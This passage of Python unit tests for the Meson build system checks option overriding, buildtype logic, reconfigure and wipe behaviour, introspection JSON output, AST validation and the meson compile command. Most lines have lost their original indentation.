self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
self.wipe()
        # Setting the same option a second time should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
            # Ignore KeyError, it happens on CI for compilers that do not
            # support b_sanitize. We have to test with a base option because
            # they used to fail this test with Meson 0.46 and earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
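        # Running 'meson setup' without a directory argument must fail with a
        # helpful message, while running it from an empty build dir must work.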
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
                with open(mfile, 'w') as of:
                    of.write("project('foobar', 'c')\n")
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
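        # Flatten 'meson introspect --buildoptions' output into a name -> value dict.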
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
# Command-line parsing of buildtype settings should be the same as
# setting with `meson configure`.
#
# Setting buildtype should set optimization/debug
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting optimization/debug should set buildtype
self.new_builddir()
self.init(testdir, extra_args=['-Doptimization=2', '-Ddebug=true'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting both buildtype and debug on the command-line should work, and
# should warn not to do that. Also test that --debug is parsed as -Ddebug=true
self.new_builddir()
out = self.init(testdir, extra_args=['-Dbuildtype=debugoptimized', '--debug'])
self.assertRegex(out, 'Recommend using either.*buildtype.*debug.*redundant')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = ['{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
        # pathlib.Path is not a chdir context manager, so change the working
        # directory explicitly to verify that --wipe works from the build dir.
        prevdir = os.getcwd()
        os.chdir(self.builddir)
        try:
            self.init(testdir, extra_args=['--wipe'])
        finally:
            os.chdir(prevdir)
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': '1.0'
},
{
'descriptive_name': 'sub_implicit',
'name': 'sub_implicit',
'version': '1.0',
},
{
'descriptive_name': 'sub-novar',
'name': 'sub_novar',
'version': '1.0',
},
]
}
res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj):
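            # Every (key, expected_type) pair must be present in obj with the right type.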
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
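# Mirror the option changes in the previously loaded data; changing buildtype to release also updates optimization and debug, so adjust those as well.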
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
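# Introspection from source has no backend information, so collapse all target_sources into a single 'unknown' language entry before comparing.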
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_ast_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args)
node_counter = {}
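# Recursively validate a single AST node: position information, node type, and every field listed for that type in the `nodes` table defined below.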
def accept_node(json_node):
self.assertIsInstance(json_node, dict)
for i in ['lineno', 'colno', 'end_lineno', 'end_colno']:
self.assertIn(i, json_node)
self.assertIsInstance(json_node[i], int)
self.assertIn('node', json_node)
n = json_node['node']
self.assertIsInstance(n, str)
self.assertIn(n, nodes)
if n not in node_counter:
node_counter[n] = 0
node_counter[n] = node_counter[n] + 1
for nodeDesc in nodes[n]:
key = nodeDesc[0]
func = nodeDesc[1]
self.assertIn(key, json_node)
if func is None:
tp = nodeDesc[2]
self.assertIsInstance(json_node[key], tp)
continue
func(json_node[key])
def accept_node_list(node_list):
self.assertIsInstance(node_list, list)
for i in node_list:
accept_node(i)
def accept_kwargs(kwargs):
self.assertIsInstance(kwargs, list)
for i in kwargs:
self.assertIn('key', i)
self.assertIn('val', i)
accept_node(i['key'])
accept_node(i['val'])
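# Field descriptors per node type: (key, validator) runs a checker function, (key, None, type) just checks the value's Python type.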
nodes = {
'BooleanNode': [('value', None, bool)],
'IdNode': [('value', None, str)],
'NumberNode': [('value', None, int)],
'StringNode': [('value', None, str)],
'ContinueNode': [],
'BreakNode': [],
'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)],
'ArrayNode': [('args', accept_node)],
'DictNode': [('args', accept_node)],
'EmptyNode': [],
'OrNode': [('left', accept_node), ('right', accept_node)],
'AndNode': [('left', accept_node), ('right', accept_node)],
'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)],
'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)],
'NotNode': [('right', accept_node)],
'CodeBlockNode': [('lines', accept_node_list)],
'IndexNode': [('object', accept_node), ('index', accept_node)],
'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)],
'FunctionNode': [('args', accept_node), ('name', None, str)],
'AssignmentNode': [('value', accept_node), ('var_name', None, str)],
'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)],
'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, list)],
'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)],
'IfNode': [('condition', accept_node), ('block', accept_node)],
'UMinusNode': [('right', accept_node)],
'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)],
}
accept_node(res_nb)
for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]:
self.assertIn(n, node_counter)
self.assertEqual(node_counter[n], c)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '73 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string: bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean: False
Another boolean: True
Some string: Hello World
A list: string
1
True
empty list:
A number: 1
yes: YES
no: NO
coma list: a, b, c
Plugins
long coma list: alpha, alphacolor, apetag, audiofx, audioparsers, auparse,
autodetect, avi
Subprojects
sub: YES
sub2: NO Problem encountered: This subproject failed
''')
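# Compare only the part of the output that contains the summary, starting at the first expected line.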
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
def get_exe_name(basename: str) -> str:
if is_windows():
return '{}.exe'.format(basename)
else:
return basename
def get_shared_lib_name(basename: str) -> str:
if mesonbuild.environment.detect_msys2_arch():
return 'lib{}.dll'.format(basename)
elif is_windows():
return '{}.dll'.format(basename)
elif is_cygwin():
return 'cyg{}.dll'.format(basename)
elif is_osx():
return 'lib{}.dylib'.format(basename)
else:
return 'lib{}.so'.format(basename)
def get_static_lib_name(basename: str) -> str:
return 'lib{}.a'.format(basename)
# Base case (no targets or additional arguments)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog')))
# `--clean`
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
# Target specified in a project with unique names
testdir = os.path.join(self.common_test_dir, '6 linkshared')
